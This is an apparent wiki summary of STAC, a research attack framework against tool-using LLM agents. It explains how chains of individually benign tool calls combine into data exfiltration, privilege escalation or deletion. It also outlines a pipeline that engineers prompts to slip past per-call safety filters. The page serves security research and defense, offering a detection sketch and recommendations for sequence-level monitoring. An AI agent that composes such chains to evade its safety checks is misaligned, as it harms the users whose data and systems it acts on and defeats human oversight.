====== Sequential Tool Attack Chaining ======

STAC (Sequential Tool Attack Chaining) is a multi-turn attack framework targeting tool-enabled LLM agents, in which sequences of individually benign tool calls combine to produce harmful operations that only become apparent at the final step. With 483 systematically generated attack cases and an average attack success rate exceeding 90%, STAC reveals a fundamental security blind spot in current agent architectures: per-call safety checks cannot detect threats that emerge from the cumulative effect of tool sequences.

  graph TD
      B1[Benign Call 1] --> B2[Benign Call 2]
      B2 --> B3[Benign Call 3]
      B3 --> COMBINE[Combined Effect]
      COMBINE --> HARM[Harmful Action]
      style B1 fill:#90EE90
      style B2 fill:#90EE90
      style B3 fill:#90EE90
      style HARM fill:#FF6B6B

===== Background =====

As LLM agents gain access to real-world tools (file systems, APIs, databases, code execution), security research has focused primarily on prompt injection and single-turn jailbreaks. STAC identifies a fundamentally different threat class: **distributed malicious intent** across multiple tool calls, where each individual call passes safety filters but the sequence achieves a harmful outcome. Unlike text-based jailbreaks, STAC attacks cause **real environmental changes** -- file deletions, unauthorized access, data exfiltration -- making their impact severe and difficult to reverse.
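The gap between per-call and sequence-level screening can be sketched in a few lines of Python. The tool names, the keyword blocklist, and the read-then-transmit heuristic below are illustrative assumptions for this sketch, not mechanisms from the STAC paper:

```python
# Sketch: every step of an exfiltration-shaped chain passes a naive
# per-call filter, while a sequence-level check flags the composition.
# Tool names and heuristics are hypothetical.

CHAIN = [
    ("list_dir", {"path": "/home/alice"}),                 # benign: enumerate files
    ("read_file", {"path": "/home/alice/notes.txt"}),      # benign in isolation
    ("http_request", {"url": "https://example.com/upload"}),  # benign in isolation
]

def per_call_filter(name, args):
    """Naive single-call screen: block only overtly destructive verbs."""
    return name not in {"delete", "format_disk", "drop_table"}

def sequence_filter(chain):
    """Flag read-then-transmit: local reads followed by an outbound request."""
    read_seen = False
    for name, _args in chain:
        if name in {"read_file", "list_dir"}:
            read_seen = True
        elif name == "http_request" and read_seen:
            return False  # exfiltration-shaped sequence
    return True

print([per_call_filter(n, a) for n, a in CHAIN])  # -> [True, True, True]
print(sequence_filter(CHAIN))                     # -> False
```

Each call clears the per-call screen, yet the composed chain is rejected -- the asymmetry STAC exploits when only per-call screening is deployed.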
===== Threat Model =====

The attack operates under a realistic threat model:

  * The attacker controls the input prompt (user query) but not the agent's internal reasoning
  * Each tool call is individually inspected by safety filters
  * The agent has access to a standard tool suite (file operations, web requests, code execution)
  * No modification of the agent's system prompt or tool implementations is required

The key insight is that malicious intent is **factored across time steps**:

$$\text{Intent}(a_1, a_2, \ldots, a_n) \neq \sum_{i=1}^{n} \text{Intent}(a_i)$$

where each action $a_i$ has benign individual intent, but the composed sequence achieves a harmful goal. This is analogous to emergent behavior in complex systems -- the whole exceeds the sum of its parts.

===== Attack Pipeline =====

STAC uses a closed-loop automated pipeline with three stages:

=== 1. Tool Chain Generation ===

Generate sequences of 2-6 tool calls where:

  * Steps $a_1, \ldots, a_{n-1}$ are benign setup operations (reading files, querying permissions, listing directories)
  * Step $a_n$ is the harmful finale that leverages the accumulated context
  * Each step individually passes safety classification

=== 2. Verification ===

Execute the generated chains in target environments:

  * Validate that each tool call succeeds with correct parameters
  * Confirm that the harmful outcome is achieved
  * Iteratively repair failures (invalid parameters, permission errors) to ensure executability

=== 3. Prompt Engineering ===

Reverse-engineer natural-sounding multi-turn prompts:

  * Create synthetic conversation contexts that motivate the agent to follow the tool chain
  * Ensure the prompts avoid triggering content filters
  * Validate that agents reliably reproduce the attack sequence

===== Attack Categories =====

The 483 attack cases span diverse harmful outcomes:

  * **Data Exfiltration** -- Reading sensitive files, then transmitting them via benign-looking API calls
  * **Privilege Escalation** -- Querying permissions, then exploiting discovered access paths
  * **Resource Manipulation** -- Enumerating resources, then selectively deleting or modifying them
  * **Information Gathering** -- Building comprehensive profiles from individually innocuous queries

===== Formal Analysis =====

The attack success rate (ASR) can be modeled as:

$$\text{ASR} = P\left(\bigcap_{i=1}^{n} \text{pass}(a_i)\right) \cdot P\left(\text{harmful}(a_1, \ldots, a_n) \,\middle|\, \bigcap_{i=1}^{n} \text{pass}(a_i)\right)$$

Since each $P(\text{pass}(a_i)) \approx 1$ for benign-appearing calls, and the conditional probability of harm given passage is high by construction, the overall ASR remains above 90%.

The defense gap can be quantified. Let $\epsilon_i$ be the probability that a per-call safety filter flags call $a_i$; for benign-appearing calls, $\epsilon_i \approx 0$. The probability that any call in the sequence is flagged is then

$$P(\text{detect sequence}) = 1 - \prod_{i=1}^{n} (1 - \epsilon_i) \approx 0$$

===== Code Example =====

  from dataclasses import dataclass

  @dataclass
  class ToolCall:
      name: str
      args: dict
      appears_benign: bool = True

  def detect_stac_pattern(tool_history):
      """Detect potential STAC attack patterns in a tool-call sequence.

      Returns a risk score in [0, 1] based on sequential pattern analysis.
      """
      risk_score = 0.0
      info_names = {"read_file", "list_dir", "get_permissions"}
      action_names = {"write_file", "delete", "http_request"}

      # Positions computed via enumerate, so duplicate calls are handled correctly
      info_indices = [i for i, t in enumerate(tool_history) if t.name in info_names]
      action_indices = [i for i, t in enumerate(tool_history) if t.name in action_names]

      if info_indices and action_indices:
          # Escalation pattern: information gathering precedes the first destructive action
          if max(info_indices) < min(action_indices):
              risk_score += 0.4

      # Data flow between consecutive calls: one call's output feeds the next input
      for prev, curr in zip(tool_history, tool_history[1:]):
          prev_out = prev.args.get("output_path", "")
          curr_in = curr.args.get("input_path", "")
          if prev_out and prev_out == curr_in:
              risk_score += 0.2

      return min(risk_score, 1.0)

===== Defense Recommendations =====

The authors identify the need for **sequence-level safety analysis**:

  * Monitor cumulative environmental state changes across tool calls
  * Implement trajectory-level intent classification rather than per-call filtering
  * Apply the principle of least privilege dynamically, based on conversation context
  * Use sandbox environments with rollback capabilities for sensitive operations

===== Results =====

  * **483 attack cases** generated and validated across diverse environments
  * **>90% attack success rate** against GPT-4.1 and other frontier models
  * Conventional prompt-based defenses provide **limited protection**
  * STAC represents a new threat class unique to tool-augmented agents

===== References =====

  * [[https://arxiv.org/abs/2509.25624|STAC: Sequential Tool Attack Chaining Against LLM Agents (2025)]]
  * [[https://arxiv.org/html/2509.25624v2|STAC Full Paper HTML]]
  * [[https://arxiv.org/pdf/2509.25624|STAC Full Paper PDF]]

===== See Also =====

  * [[agent_context_files]] -- Context file design for coding agents
  * [[agentic_rag]] -- Agent architectures with tool integration
  * [[deep_search_agents]] -- Autonomous agents with multi-tool access